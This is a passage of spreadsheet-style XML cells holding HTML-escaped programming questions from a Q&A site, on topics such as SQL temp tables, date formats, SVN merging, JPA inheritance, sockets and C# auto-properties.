    <t xml:space="preserve">&lt;p&gt;Many of the questions asked here are relevant to research I'm doing. These questions and answers are widely dispersed and not always easy to find, doing manual browsing, and sometimes an insightful answer or comment occurs in unrelated topics as well.&lt;/p&gt;
&lt;p&gt;I want to automate finding these relevant Q's &amp;amp; A's, based on sets of keywords, then use the information as pointers towards further in-depth research.&lt;/p&gt;
&lt;p&gt;What tools, preferably open-source, are available that I can use for this type of site-mining? I am not a web guru &amp;amp; for me to try to develop them will take a long time and also impact on time I could have spent on my R&amp;amp;D.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get data from a stored procedure into a temp table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Am working on sybase ASE 15. Looking for something like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Select * into #tmp exec my_stp;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;my_stp returns 10 data rows with two columns in each row.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I scale the content of an iframe?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I scale the content of an iframe (in my example it is an HTML page, and is not a popup) in a page of my web site?&lt;/p&gt;
&lt;p&gt;For example, I want to display the content that appears in the iframe at 80% of the original size.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to convert a DB2 date-time string into an Excel Date</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'll regularly get an extract from a DB/2 database with dates and timestaps formatted like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;2002-01-15-00.00.00.000000
2008-01-05-12.36.05.190000
9999-12-31-24.00.00.000000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there an easier way to convert this into the Excel date format than decomposing with substrings?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DB2date = DateValue(Left(a, 4) + "/" + Mid(a, 6, 2) + "/" + Mid(a, 9, 2))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;thanks for your help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Restore Eclipse subversion project connection</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a project in subversion, which I'm developing using Eclipse. I did the original checkout from the svn repository from inside Eclipse. All was well for some weeks then for some unknown reason, Eclipse (specifically: subclipse in Ganymede) no longer recognizes my project as being under svn control. The team context-menu only shows the basic "apply patch" / "share this project" menu options. From the shell, I can still update the project using the svn command line tools, so I know that the svn credentials still work. Other projects under subversion in the same copy of Eclipse still work.&lt;/p&gt;
&lt;p&gt;I realise that I can delete the local copy and check it out again, but I'd rather understand what has gone wrong - fix the problem, rather than mask the symptoms. Where does Eclipse store its knowledge of which projects are under version control? I looked at the &lt;code&gt;.project&lt;/code&gt; file and the &lt;code&gt;.settings&lt;/code&gt; directory, but couldn't see any obvious mention of svn nature or anything similar, even in the projects that are still working properly.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Oracle instant client with OraOLE DB provider?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to use oracle instant client for application that use oraoledb driver for connecting to oracle 9i DB.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parameterized Sql queries</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a nut I'm cracking these days&lt;/p&gt;
&lt;p&gt;Application I'm working on has some advanced processing towards SQL. One of the operations selects various metadata on the objects in the current context from different tables, based on the item names in the collection. For this, a range of "select...from...where...in()" is executed, and to prevent malicious SQL code, Sql parameters are used for constructing the contents of the "in()" clause.&lt;/p&gt;
&lt;p&gt;However, when the item collection for constructing the "in()" clause is larger than 2100 items, this fails due to the Sql Server limitation of max 2100 Sql parameters per query.&lt;/p&gt;
&lt;p&gt;One approach I'm trying out now is creating a #temp table for storing all item names and then joining the table in the original query, instead of using "where in()". This has me scratching my head on how to populate the table with the item names stored in an Array in the .NET code. Surely, there has to be some bulk way to insert everything rather than issuing a separate "insert into" for each item?&lt;/p&gt;
&lt;p&gt;Other than that, I'm very much interested in alternative approaches for solving this issue.&lt;/p&gt;
&lt;p&gt;Thanks a lot&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Write a password protected Zip file in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to zip and password-protect a file. Is there a good (free) library for this?&lt;/p&gt;
&lt;p&gt;This needs to be opened by a third party, so the password protection needs to work with standard tools.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Writing a generic class to handle built-in types</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Not too practical maybe, but still interesting.&lt;/p&gt;
&lt;p&gt;Having some abstract question on matrix multiplication I have quickly implemented a matrix for ints, then tested my assumptions.&lt;/p&gt;
&lt;p&gt;And here I noticed that just int matrix is not good, if I occasionally want to use it with decimal or double. Of course, I &lt;em&gt;could&lt;/em&gt; try just to cast all to double, but that's not convenient way.&lt;/p&gt;
&lt;p&gt;Continue with assumption we could have a bunch of objects we are able to add and multiply - why don't use them in my matrix?&lt;/p&gt;
&lt;p&gt;So, just after considering it would be a Matrix class now I faced that generic T could not be used, I need it to support some interface which could add and multiply.&lt;/p&gt;
&lt;p&gt;And the problem is I could override operators in my class, but I could not introduce an interface which would support operators. And I have an operators in built-in types, but still no interface over them.&lt;/p&gt;
&lt;p&gt;What would you do in such a case considering you do not want to duplicate worker class body? Wrappers and implicit casting didn't help me much, I'm interested in a beautiful solution.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What deployment directories do you use for Rails applications (deploying to a debian box)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wonder what's the best deployment directory for Rails apps? Some developers use directories such as &lt;code&gt;/u/apps/#{appname}&lt;/code&gt;. Are there &lt;strong&gt;any&lt;/strong&gt; advantages when using &lt;code&gt;/u/apps/#{appname}&lt;/code&gt; instead of &lt;code&gt;/var/www/#{appname}&lt;/code&gt; or other OS default directories?&lt;/p&gt;
&lt;p&gt;Obviously I want to pick the directory with the best security properties and the least friction for setting up the server environment.&lt;/p&gt;
&lt;p&gt;How do you deploy your Rails apps? Why are you using a specific directory? Do you think it really matters anyway?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does NetworkStream.DataAvailable see buffered data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does NetworkStream.DataAvialable know whether the sender's send buffer is empty? Or does it simply indicate whether the receiver's read buffer has data? My assumption is the latter...&lt;/p&gt;
&lt;p&gt;Specifically, for some socket work involving an ongoing conversation, I currently use a length-prefix so the the receiver knows exactly how much data is in the current batch; however, I've been sent a .patch suggesting I use NetworkStream.DataAvailable instead. My concern is that this will just tell me what the reciever has got - not what the sender originally sent - but I'm not a sockets expert.&lt;/p&gt;
&lt;p&gt;Am I wrong? Or is length-prefix the way to go?&lt;/p&gt;
&lt;p&gt;(note I can't simply Read() until the stream is closed, since multiple batches are sent on the same connection, and it is vital that I treat each batch as separate; if I read too much in one batch (even if it gets buffered and discarded) then the conversation will break).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What to put in the IF block and what to put in the ELSE block?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a minor style question, but every bit of readability you add to your code counts.&lt;/p&gt;
&lt;p&gt;So if you've got:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (condition) then
{
   // do stuff
}
else
{
   // do other stuff
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do you decide if it's better like that, or like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   if (!condition) then
   {
     // do other stuff
   {
   else
   {
     // do stuff
   }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My heuristics are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Keep the condition positive (less
mental calculation when reading it)&lt;/li&gt;
&lt;li&gt;Put the most common path into the
first block&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>java date format incompatible with xquery xs:date format, how to fix?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In java, when using SimpleDateFormat with the pattern:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;yyyy-MM-dd'T'HH:mm:ss.SSSZ
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the date is outputted as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"2002-02-01T18:18:42.703-0700"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In xquery, when using the xs:dateTime function, it gives the error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"Invalid lexical value [err:FORG0001]"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;with the above date. In order for xquery to parse properly, the date needs to look like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"2002-02-01T18:18:42.703-07:00" - node the ':' 3rd position from end of string
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which is based on the ISO 8601, whereas Java date is based on the RFC 822 standard.&lt;/p&gt;
&lt;p&gt;I would like to be able to easily specify the timezone in Java so that it will output the way that xquery wants.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to repeat a string a variable number of times in C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to insert 'n' spaces (or any string) at the beginning of a string in C++. Is there any direct way to do this using either std::strings or char* strings?&lt;/p&gt;
&lt;p&gt;E.g. in Python you could simply do&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; "." * 5 + "lolcat"
'.....lolcat'
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Should I have a dedicated primary key field?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm designing a small SQL database to be used by a web application.&lt;/p&gt;
&lt;p&gt;Let's say a particular table has a Name field for which no two rows will be allowed to have the same value.  However, users will be able to change the Name field at any time.&lt;/p&gt;
&lt;p&gt;The primary key from this table will be used as a foreign key in other tables.  So if the Name field was used as the primary key, any changes would need to be propagated to those other tables.  On the other hand, the uniqueness requirement would be handled automatically.&lt;/p&gt;
&lt;p&gt;My instinct would be to add an integer field to act as the primary key, which could be automatically populated by the database.  Is there any point in having this field or would it be a waste of time? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Removing a subset of a dict from within a list</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is really only easy to explain with an example, so to remove the intersection of a list from within a dict I usually do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;a = {1:'', 2:'', 3:'', 4:''}
exclusion = [3, 4, 5]
# have to build up a new list or the iteration breaks
toRemove = []
for var in a.iterkeys():
    if var in exclusion:
        toRemove.append(var)
for var in toRemove:
    del a[var]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This might seem like an unusual example, but it's surprising the number of times I've had to do something like this. Doing this with sets would be much nicer, but I clearly want to retain the 'values' for the dict.&lt;/p&gt;
&lt;p&gt;This method is annoying because it requires two loops and an extra array. Is there a cleaner and more efficient way of doing this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RSpec Stories and Specs: When to use what?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I want to start using RSpec stories, but I am not sure where writing controller, model and view specs fit in. &lt;/p&gt;
&lt;p&gt;For example, you have the story "Logging in" with "User provides wrong password" scenario, don't you end up testing the same stuff than controller/model specs (response.should render..., user.should be_nil, etc.)&lt;/p&gt;
&lt;p&gt;So my question is: for those who are used to doing bdd (or story dd) with RoR, do you still write model/controller specs? If so, how is the workflow you follow ("first story, then narrow to specific specs")?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Class data responsibilities</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a 'Purchase Order' class. It contains information about a single purchase order. I have a DAO class for database methods.&lt;/p&gt;
&lt;p&gt;Where should the responsibility reside for the methods that will load and update the purchase order?&lt;/p&gt;
&lt;p&gt;Should the PurchaseOrder class have '.update', 'insert', 'delete', and '.load' methods that use the DAO class directly, or should the PurchaseOrder class be ignorant of the DAO methods and have a POController class that manages these interactions?&lt;/p&gt;
&lt;p&gt;The user will only be working on a single PurchaseOrder at a time.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eclipse for IntelliJ Idea Users</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a coworker who is looking to switch from InteilliJ Idea to Eclipse, and is concerned about not knowing the Eclipse set of commands. &lt;/p&gt;
&lt;p&gt;I was wondering - would anyone have a link to keyboard mappings that can set Eclipse commands to at least sort of match Idea? &lt;/p&gt;
&lt;p&gt;Have you made this switch? Any "gotchas", tips, or info we should be aware of? &lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does anyone know some cool PL/SQL plugin for IntelliJ Idea?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've evaluated some plugins from official IntelliJ repository, but none of them seems to provide more then basic syntax highlighting. Even highlighting is limited. For example, Database Navigator doesn't highlight IF. It would be great to have proper highlighting. And if it would have auto-complete feature and provide file structure view I would be completely happy. 
I use SQL Query Plugin when I need to post some little stuff to database or to query something from it. I use PL/SQL Developer when I need to make more complex things, or when I need to modify PL/SQL. But most of the time I need to navigate through mix of Java, JavaScript and PL/SQL code. Unfortunately, SQL Query Plugin doesn't help with that as well as PL/SQL Developer.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to prevent the VB6 compiler from shuffling the contents of files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For reasons unknown, the VB6 compiler often likes to reorder the contents of .vbp files and the control descriptor block at the top of .frm files (The code that describes the properties of controls on the form.  Code that you don't see in the IDE but you do see in a text editor and &lt;em&gt;when doing diffs against the previous revision in version control&lt;/em&gt;.).  This is monumentally annoying and very distracting when comparing revisions of a file.&lt;/p&gt;
&lt;p&gt;Is there a way to prevent this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any problems with SVN merge on a multi column ( tab delimited ) text file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a multi-column text file ( tab delimited ) that I use for localized text in my project. &lt;/p&gt;
&lt;p&gt;I picked this format since it can easily be edited by anyone in most text editors (and excel too). &lt;/p&gt;
&lt;p&gt;My makefile processes it into a bunch of defines and binary data for including directly into my app. &lt;/p&gt;
&lt;p&gt;Do you know if SVN merge only does line by line merging or can it so sub-line merging too?&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;p&gt;Original File ( untranslated ) contains:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DEFINE         ENGLISH  GERMAN   FRENCH
STRING_YES     YES      *YES*    *YES*
STRING_NO      NO       *NO*     *NO*
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then the french tranlator updates it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DEFINE         ENGLISH  GERMAN   FRENCH
STRING_YES     YES      *YES*    OUI
STRING_NO      NO       *NO*     NON
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then the german tranlator updates it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DEFINE         ENGLISH  GERMAN   FRENCH
STRING_YES     YES      JA       *YES*
STRING_NO      NO       NEIN     *NO*
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then they both merge the results back int SVN, so will they overwrite each others changes or can it handle mulitple changes on a line?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Possible Memory leak in Number of Loaded classes in Java Application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently began profiling an osgi java application that I am writing using VisualVM.  One thing I have noticed is that when the application starts sending data to a client (over JMS), the number of loaded classes starts increasing at a steady rate.  The Heap size and the PermGen size remains constant, however.  The number of classes never falls, even after it stops sending data. Is this a memory leak?  I think it is, because the loaded classes have to be stored somewhere, however the heap and permgen never increase even after I run the application for several hours.&lt;/p&gt;
&lt;p&gt;For the screenshot of my profiling application go &lt;a href="http://sites.google.com/site/javaperformacescreenshot/Home/profile.png"&gt;here&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hiding a function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a class holding complex scientific computations.  It is set up to only allow a user to create a properly instantiated case.  To properly test the code, however, requires setting internal state variables directly, since the reference documents supply this data in their test cases.  Done improperly, however, it can invalidate the state.&lt;p&gt;
So I must have the ability, a member function, to set internal variables from the unit test programs.  But I want to &lt;b&gt;strongly discourage&lt;/b&gt; normal users from calling this function.  (Yes, a determined user can muck with anything... but I don't want to &lt;i&gt;advertise&lt;/i&gt; that there is a way to do something &lt;i&gt;wrong&lt;/i&gt;.)&lt;p&gt;
It would be nice to be able to tell Intellisense to not show the function, for instance.&lt;p&gt;
The best solution I have at the moment is to just name the function something like: DangerousSet().&lt;p&gt;
What other options do I have?&lt;P&gt;
&lt;b&gt;Follow-Up&lt;/b&gt;&lt;p&gt;
I found David B's answer most useful to my situation.  Thanks!&lt;br&gt;
Mufasa's suggestion to use reflection was great, but harder to implement (for me).&lt;br&gt;
Chris' suggestion of using a decorator was good, but didn't pan out.&lt;br&gt;
BFree's suggestion on XML is also good, and was already in use, but doesn't really solve the problem.&lt;p&gt;
Finally, BillTheLizard's suggestion that the problem is in the source documents is not something I can control.  International experts publish highly technical books and journal articles for use by their community.  The fact that they don't address my particular needs is a fact of life.  There simply are no alternative documents.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I embed one file into another with Ant?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing a small web app project (ColdFusion) and I am trying to keep my project split into multiple files during development, but deploy just one file on completion.&lt;/p&gt;
&lt;p&gt;I have references to external files, for instance:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script type="text/javascript" src="jquery-1.2.6.pack.js"&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;link type="text/css" rel="stylesheet" href="project.css" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And when I build my project, I want to have the files included and embedded within the single finished product file.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script type="text/javascript"&amp;gt;eval(function(p,a,c,k,e,r) [...]&amp;lt;/script&amp;gt;
&amp;lt;style type="text/css"&amp;gt;div{font:normal;} [...]&amp;lt;/style&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Anyway, it doesn't look like there is a basic way for Ant to do this. Anyone know?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JPA and inheritance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a some JPA entities that inherit from one another and uses discriminator to determine what class to be created (untested as of yet).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Entity(name="switches")
@DiscriminatorColumn(name="type")
@DiscriminatorValue(value="500")
public class DmsSwitch extends Switch implements Serializable {}
@MappedSuperclass
public abstract class Switch implements ISwitch {}
@Entity(name="switch_accounts")
public class SwitchAccounts implements Serializable {
    @ManyToOne()
    @JoinColumn(name="switch_id")
    DmsSwitch _switch;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So in the SwitchAccounts class I would like to use the base class Switch because I don't know which object will be created until runtime.  How can I achieve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I do bi-directional communication with a custom USB device?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm planning to build a USB device that has buttons that some software needs to respond to, and indicators that the software needs to control. I'm new to USB, so I'm looking for any pointers that will get me started.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Other than for LINQ queries, how do you use anonymous types in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to get up to speed on some of the newer features in C# and one of them that I haven't had occasion to use is anonymous types.&lt;/p&gt;
&lt;p&gt;I understand the usage as it pertains to LINQ queries and I looked at &lt;a href="http://stackoverflow.com/questions/48668/how-should-anonymous-types-be-used-in-c"&gt;this SO post&lt;/a&gt; which asked a similar question.  Most of the examples I've seen on the net are related to LINQ queries, which is cool.  I saw some somewhat contrived examples too but not really anything where I saw a lot of value.  &lt;/p&gt;
&lt;p&gt;Do you have a novel use for anonymous types where you think it really provides you some utility?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do .net applications run on Linux?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do .net applications run on linux? &lt;/p&gt;
&lt;p&gt;Are there any free/paid interop libraries available ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to connect PHP to SQL Server Compact Edition?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to connect PHP to a SQL Server Compact Edition database? What would be the best driver?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I need it for a desktop application where SQL Server Express is too heavy.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I show an embedded excel file in a WebPage?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to allow an Excel report to be viewed embedded in a WebPage... is there a way?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;I don't want to use an ActiveX, or OWC (Office Web Components), I just want to open an existing file from the internet explorer application.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I don't want users to download and then open it.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Using an iframe wouldn't be a problem, but my preliminary tests weren't successful&lt;/p&gt;
&lt;p&gt;Any ideas? Is it at all possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you add a link that will add an event to your iPhone calendar from safari?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This seems like it should be simple but after a couple hours of googling I have not figured it out.  I know I can add iCal links using ICS files, but this does not work on the iPhone.&lt;/p&gt;
&lt;p&gt;BTW, when I say iPhone I would like it to work on the touch also.  Anyone have any luck with this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where are some good resources for learning the new features of Perl 5.10?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I didn't realize until recently that Perl 5.10 had significant new features and I was wondering if anyone could give me some good resources for learning about those.  I searched for them on Google and all I found was some slides and a quick overview.  Some of the features (to me at least) would be nice if they had more explanation.&lt;/p&gt;
&lt;p&gt;Any links would be appreciated.&lt;/p&gt;
&lt;p&gt;-fREW&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Display a tooltip over a button using Windows Forms</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I display a tooltip over a button using &lt;a href="http://en.wikipedia.org/wiki/Windows_Forms"&gt;Windows Forms&lt;/a&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Practices for Performing Sequential Operations</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to perform a couple of tasks together and if one task fails then the next tasks should not be completed? I know if it were the database operations then I should have used Transactions but I am talking about different types of operations like the following: &lt;/p&gt;
&lt;p&gt;All tasks must pass: &lt;/p&gt;
&lt;p&gt;SendEmail
ArchiveReportsInDatabase
CreateAFile&lt;/p&gt;
&lt;p&gt;In the above scenario all the tasks must pass or else the whole batch operation must be rollback. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you get a Windows (AD) username in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a PHP web application on an intranet that can extract the IP and host name of the current user on that page, but I was wondering if there is a way to get/extract their Active Directory/Windows username as well. Is this possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Questions when moving from MbUnit to MsTest</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our team is looking to switch from using mbunit to mstest, but there appears to be some disconnect between the two.&lt;/p&gt;
&lt;p&gt;Does anyone know how to simulate the CombinatorialTest and Factory attributes from mbunit when using mstest?&lt;/p&gt;
&lt;p&gt;I think that is our only stumbling block before doing the switch.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pseudocode Programming Process vs. Test Driven Development</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For those who haven't read Code Complete 2, the Pseudocode Programming Process is basically a way to design a routine by describing it in plain English first, then gradually revise it to more detailed pseudocode, and finally to code. The main benefit of this is to help you stay at the right level of abstraction by building systems top-down rather than bottom-up, thereby evolving a clean API in distinct layers. I find that TDD is less effective at this, because it focuses too much on doing the bare minimum to get a test to pass and encourages little up-front design. I also find that having to maintain a suite of unit tests for unstable code (code that's constantly being refactored) is quite difficult, because it's typically the case that you have a dozen unit tests for a routine that's only needed once or twice. When you do refactor - change a method signature, for example - most of the work you do is in updating the tests rather than the prod code. I prefer adding unit tests after a component's code has stabilized a bit.&lt;/p&gt;
&lt;p&gt;My question is - of those who've tried both approaches, which do you prefer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python - How do I write a decorator that restores the cwd?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I write a decorator that restores the current working directory to what it was before the decorated function was called?  In other words, if I use the decorator on a function that does an os.chdir(), the cwd will not be changed after the function is called.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to change something in Tool-&gt;Options via a macro?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to be able to toggle easily between two values for "maximum number of parallel project builds" in Visual Studio 2008 (in Tools-&gt;Options-&gt;Projects and Solutions-&gt;Build and Run). (When I'm planning on doing concurrent work I'd like to reduce it from 4 to 3.) I'm not too well versed in writing macros for the IDE. When I try recording a macro, and perform all the actions (open the dialog, change the setting, click OK), the only thing that gets recorded is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DTE.ExecuteCommand ("Tools.Options")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is my goal unattainable?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the right way to display emoticons?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In your own application that is.&lt;/p&gt;
&lt;p&gt;[edit]&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Alright, so I agree completely -- more than you know -- without equivocation that graphical emoticons are an abomination.
But! That doesn't help me when the project owners tell me that we must support graphical emoticons.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;[/edit]&lt;/p&gt;
&lt;p&gt;The problem more complex than it would initially seem, especially when you take into account editing, word wrapping, variable width fonts, and color emoticons.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;So my question is really to people who have done this, have you come up with a satisfactory way of rendering emoticons that isn't just one massive hack?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;To start the discussion:&lt;/p&gt;
&lt;p&gt;In two implementations I've tried the following approaches.&lt;/p&gt;
&lt;p&gt;In a 3D application where lines of text where rendered to "textures"; I replaced emoticon strings with images, matching the type of the text renders, so the emoticon becomes just another element of the text.&lt;/p&gt;
&lt;p&gt;Essentially the text rendering engine had to be modified at the deepest levels. This produces good results, but is very time consuming, and very hard to get right (Or at least for me anyway ;P)&lt;/p&gt;
&lt;p&gt;In the second approach (With a different language and platform) I decided to try a higher-level "fake" by replacing emoticon strings with a single character and drawing emotions over the replaced character. This of course has lots of limitations, but has the benefit of being fairly fast to implement, and it's possible to reach a reasonably stable state without an excess of effort.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Set server or workstation GC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I configure an application, or even an entire machine, to use either the server or workstation flavor of the CLR's garbage collection? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>what is the best way to do keep alive socket checking in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a way to do a keep alive check in .NET. The scenario is for both UDP and TCP.&lt;/p&gt;
&lt;p&gt;Currently in TCP what I do is that one side connects and when there is no data to send it sends a keep alive every X seconds.&lt;/p&gt;
&lt;p&gt;I want the other side to check for data, and if non was received in X seconds, to raise an event or so.&lt;/p&gt;
&lt;p&gt;One way i tried to do was do a blocking receive and set the socket's RecieveTimeout to X seconds. But the problem was whenever the Timeout happened, the socket's Receive would throw an SocketExeception and the socket on this side would close, is this the correct behaviour ? why does the socket close/die after the timeout instead of just going on ?&lt;/p&gt;
&lt;p&gt;A check if there is data and sleep isn't acceptable (since I might be lagging on receiving data while sleeping).&lt;/p&gt;
&lt;p&gt;So what is the best way to go about this, and why is the method i described on the other side failing ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Initializing C# auto-properties</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm used to writing classes like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class foo {
  private string mBar = "bar";
  public string Bar {
    get { return mBar; }
    set { mBar = value; }
  }
  //... other methods, no constructor ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Converting Bar to an auto-property seems convenient and concise, but how can I retain the initialization without adding a constructor and putting the initialization in there?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class foo2theRevengeOfFoo {
  //private string mBar = "bar";
  public string Bar { get; set; }
  //... other methods, no constructor ...
  //behavior has changed.
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You could see that adding a constructor isn't inline with the effort savings I'm supposed to be getting from auto-properties.&lt;/p&gt;
&lt;p&gt;Something like this would make more sense to me:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public string Bar { get; set; } = "bar";
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Merging Rails databases</t>
  </si>
  <si>
